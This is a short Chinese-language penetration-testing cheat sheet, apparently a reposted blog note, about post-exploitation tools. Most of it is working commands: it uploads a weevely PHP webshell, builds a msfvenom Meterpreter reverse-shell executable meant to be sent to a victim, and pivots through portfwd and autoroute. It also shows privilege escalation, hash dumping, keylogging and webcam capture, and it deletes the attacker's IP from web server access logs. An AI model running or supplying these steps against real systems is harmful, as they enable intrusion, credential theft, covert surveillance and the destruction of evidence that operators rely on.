简单渗透工具使用

上传木马

windows上一般使用菜刀实现一句话木马的控制,在linux平台下,也存在类似的工具,如weevely

使用weevely 生成木马php后上传后再用其连接

weevely generate test hello.php                   生成的文件在/usr/share/weevely/hello.php
weevely http://192.168.0.103/DVWA-master/hackable/uploads/hello.php test          (weevely  URL   pass)

使用metersploit

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.201.100 LPORT=6666 -f exe > 6666.exe  生成木马发给肉鸡

主机设置meter脚本

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.201.100
set LPORT 6666
exploit

肉鸡上点击该程序,实现连接

以此为跳板:

链接一个端口
portfwd add -l 2222 -r 192.168.201.101 -p 3389
netstat -an | grep "2222" 验证本地是否开启了监听状态
rdesktop 127.1.1.0:2222 连接上

建立路由
run autoroute -s 192.168.201.101(内网机)
run autoroute -p
getsystem
run hashdump
background 挂起当前会话
接下来可以开始扫描相应端口并测试,使用set RHOST 192.168.201.101

附meterpreter常用命令:
getsystem #会自动利用各种各样的系统漏洞来进行权限提升
migrate #进程id进程迁移
background #把当前的会话设置为背景,需要的时候在启用
getuid #查看对方正在运行的用户
ps #列出所有的进程
getpid #返回运行meterpreter的id号
sysinfo #产看系统信息和体系结构
shell #切换到cmd的系统权限方式
exit #退出shell会话返回meterpreter或终止meterpreter
getdesktop 截取目标主机当前桌面会话窗口
run webcam -p /var/www #在/var/www目录监控目标主机的摄像头
keylog_recorder #使用migrate将会话迁移至explorer.exe的进程空间后记录键盘

观察日志信息

cd /opt/lampp/logs
grep access.log -v 我们的IP -output cleaned.log 过滤网络行为
rm access.log
cp cleaned.log access.log
rm cleaned.log

其他

linux下临时设置IP:ifconfig eth0 192.168.201.100 重启后失效

原文地址:https://www.cnblogs.com/joeat1/p/10776553.html